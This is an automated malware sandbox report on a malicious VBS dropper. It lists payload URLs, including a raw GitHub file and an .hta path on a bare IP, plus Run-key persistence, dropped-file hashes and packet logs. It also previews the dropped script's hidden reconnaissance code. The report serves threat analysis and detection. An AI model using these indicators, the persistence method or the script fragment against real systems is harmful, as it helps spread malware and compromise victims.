https://raw.githubusercontent.compowershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmpfalseunknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://go.micropowershell.exe, 00000003.00000002.2171869287.0000022A844FC000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://contoso.com/Licensepowershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://raw.githubusercontent.compowershell.exe, 00000003.00000002.2171869287.0000022A84BCE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
https://contoso.com/Iconpowershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://oneget.orgXpowershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://raw.githubusercontpowershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmpfalse
    		unknown
    https://aka.ms/pscore6powershell.exe, 00000001.00000002.2215386722.0000021D94D87000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://aka.ms/pscore68powershell.exe, 00000001.00000002.2215386722.0000021D94D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://72.5.43.53(powershell.exe, 00000003.00000002.2171869287.0000022A83A08000.00000004.00000800.00020000.00000000.sdmpfalse
      		unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2215386722.0000021D94DCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe;powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmpfalseunknown
      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
      https://oneget.orgpowershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      72.5.43.53
      		unknownUnited States
      		16769UNASSIGNEDfalse
      185.199.111.133
      		raw.githubusercontent.comNetherlands
      		54113FASTLYUSfalse

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1523826
      Start date and time:2024-10-02 05:25:53 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 43s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:12
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:WW8kzvnphl.vbs
      renamed because original name is a hash value
      Original Sample Name:2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd.vbs
      Detection:MAL
      Classification:mal100.expl.evad.winVBS@11/7@1/2
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 14
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Execution Graph export aborted for target powershell.exe, PID 7464 because it is empty
      • Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      04:26:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbs
      04:27:03AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\autopatia.vbs
      23:26:47API Interceptor1024x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      72.5.43.53PO554830092024.xlsGet hashmaliciousUnknownBrowse
      • 72.5.43.53/450/ne/IEnetworkprojectupdate.hta
      PO554830092024.xlsGet hashmaliciousUnknownBrowse
      • 72.5.43.53/450/ne/IEnetworkprojectupdate.hta
      PO554830092024.xlsGet hashmaliciousUnknownBrowse
      • 72.5.43.53/450/ne/IEnetworkprojectupdate.hta
      185.199.111.1332THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
        R183nzNa89.exeGet hashmaliciousUnknownBrowse
          Shipping Documents.xlsGet hashmaliciousRemcosBrowse
            Scan Order and Specification 01-10- 2024.docxGet hashmaliciousRemcosBrowse
              DRAFT_PO.vbsGet hashmaliciousUnknownBrowse
                file.exeGet hashmaliciousXWorm, XmrigBrowse
                  SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                    https://rajkamalkanna.github.io/Facebook-Login-Page/Get hashmaliciousHTMLPhisherBrowse
                      https://vinitk1509.github.io/NETFLIXGet hashmaliciousHTMLPhisherBrowse
                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          raw.githubusercontent.com2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.108.133
                          mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          • 185.199.108.133
                          00#U2800.exeGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          asegurar.vbsGet hashmaliciousRemcosBrowse
                          • 185.199.110.133
                          dcsegura.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                          • 185.199.110.133
                          asegura.vbsGet hashmaliciousRemcosBrowse
                          • 185.199.108.133
                          R183nzNa89.exeGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          hHNfR2jxEo.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                          • 185.199.109.133
                          tCNVKM4mkt.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                          • 185.199.108.133

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          FASTLYUS2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.108.133
                          mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          • 185.199.108.133
                          https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                          • 151.101.194.137
                          https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                          • 151.101.2.137
                          http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                          • 151.101.194.137
                          http://detection.fyiGet hashmaliciousNetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, XmrigBrowse
                          • 185.199.110.154
                          00#U2800.exeGet hashmaliciousUnknownBrowse
                          • 185.199.110.133
                          https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                          • 151.101.66.137
                          https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.noGet hashmaliciousHTMLPhisherBrowse
                          • 151.101.194.137
                          UNASSIGNEDPO554830092024.xlsGet hashmaliciousUnknownBrowse
                          • 72.5.43.53
                          PO554830092024.xlsGet hashmaliciousUnknownBrowse
                          • 72.5.43.53
                          PO554830092024.xlsGet hashmaliciousUnknownBrowse
                          • 72.5.43.53
                          SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elfGet hashmaliciousMiraiBrowse
                          • 205.231.188.78
                          Callus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                          • 199.67.80.79
                          7fhY3EJltt.lnkGet hashmaliciousUnknownBrowse
                          • 72.5.43.19
                          SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elfGet hashmaliciousMiraiBrowse
                          • 156.134.188.67
                          staff recordpdf2024.exeGet hashmaliciousAgentTeslaBrowse
                          • 131.226.2.60
                          SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
                          • 147.136.59.34
                          ORDER DATASHEET.batGet hashmaliciousRemcos, GuLoaderBrowse
                          • 131.226.2.26

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          3b5074b1b5d032e5620f69f9f700ff0e89SkYNNpdi.vbsGet hashmaliciousAveMaria, PrivateLoader, PureLog StealerBrowse
                          • 185.199.111.133
                          qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                          • 185.199.111.133
                          2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                          • 185.199.111.133
                          ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                          • 185.199.111.133
                          0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                          • 185.199.111.133
                          PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          • 185.199.111.133
                          file.exeGet hashmaliciousCredential FlusherBrowse
                          • 185.199.111.133
                          mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                          • 185.199.111.133
                          DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.199.111.133

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\ProgramData\autopatia.vbs

                          Download File
                          Process:C:\Windows\System32\cmd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):437480
                          Entropy (8bit):5.105403560005336
                          Encrypted:false
                          SSDEEP:6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
                          MD5:42320E659E8E1885EB96342E52E4EC60
                          SHA1:8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
                          SHA-256:5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
                          SHA-512:CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9434
                          Entropy (8bit):4.928515784730612
                          Encrypted:false
                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                          MD5:D3594118838EF8580975DDA877E44DEB
                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                          Malicious:false
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulF7///h:NllU
                          MD5:34C16D1FA50B565A72B382C978CB2D56
                          SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                          SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                          SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                          Malicious:false
                          Preview:@...e................................................@..........

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzmjudtg.gn3.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufyz4xus.d05.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvp2ytn3.kpy.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0q5ealq.aek.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          Static File Info

                          General

                          File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Entropy (8bit):3.744635927192172
                          TrID:
                          • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                          • MP3 audio (1001/1) 32.22%
                          • Lumena CEL bitmap (63/63) 2.03%
                          • Corel Photo Paint (41/41) 1.32%
                          File name:WW8kzvnphl.vbs
                          File size:248'204 bytes
                          MD5:adadc5d47f87dd519f9a7da9ba03daf5
                          SHA1:3de39ed4ff76305d9dc87b484bf2b78d7f332dbf
                          SHA256:2302e959d65c30ae1abd47d34d4e421bb629b9ab4a2ec04277170691bb5abefd
                          SHA512:93296d34e418a2885e2b9beb0c58078bb0d2f9ae7f27d39c6b404158e37d936efdd1ba10277ffbe5dc23a1bc26e0eb9d92e90a082ab7d44c4ffb39ff5d5ee1a0
                          SSDEEP:3072:KstfnxfYcd4gQu4Nl2YPfeesDvb7Ngt5pZGwRDaapS7emX8ANolXiZ+k+ugv/6xy:xfniUNYlMe6sAyY+uY6M/es
                          TLSH:0234080226EA7008F1F32F5796F955F94F67B9652A39821D648C1B0E1BE3E80CD51BB3
                          File Content Preview:..L.K.N.C.B.A.c.C.t.h.c.i.i.W.Z.R.W.W.P.h.J.o.L.P. .=. .".O.W.G.i.u.v.k.W.x.i.o.A.C.G.L.B.s.Z.k.o.l.k.I.L.".....q.u.L.G.p.e.L.P.d.c.G.A.L.c.e.L.L.G.i.s.W.W.t.c. .=. .".o.e.P.L.e.W.x.W.K.k.z.W.H.N.m.C.G.b.f.c.p.U.d.b.".....e.W.t.c.Z.L.p.C.A.L.U.m.f.L.I.d.C

                          File Icon

                          Icon Hash:68d69b8f86ab9a86

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 2, 2024 05:26:48.864020109 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:48.864078999 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:48.864167929 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:48.873025894 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:48.873039007 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.336308002 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.336417913 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.340517998 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.340538025 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.340826988 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.352858067 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.399404049 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447026014 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447618961 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447654963 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447665930 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.447690010 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447724104 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447731972 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.447737932 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.447772980 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.448352098 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.448683977 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.448712111 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.448740959 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.448756933 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.448796988 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.452336073 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.452388048 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.452435017 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.452452898 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.492675066 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.543792009 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.543854952 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.543925047 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.543950081 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.543987989 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544018984 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544050932 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544070959 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544173002 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.544173002 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.544182062 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544235945 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.544694901 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544796944 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544825077 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544847012 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.544852972 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.544892073 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.546610117 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.546618938 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.546658993 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.546677113 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.546684980 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.546710968 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.546722889 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.630934000 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.630956888 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.631099939 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.631127119 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.631190062 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.632564068 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.632579088 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.632638931 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.632653952 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.632692099 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.635188103 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.635210037 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.635283947 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.635289907 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.635298967 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.635314941 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.635332108 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.635337114 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.635364056 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.635406971 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.717816114 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.717839956 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.718008995 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.718039989 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.718095064 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.718661070 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.718679905 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.718727112 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.718732119 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.718767881 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.719038963 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.719054937 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:49.719099998 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:49.719105005 CEST44349730185.199.111.133192.168.2.4
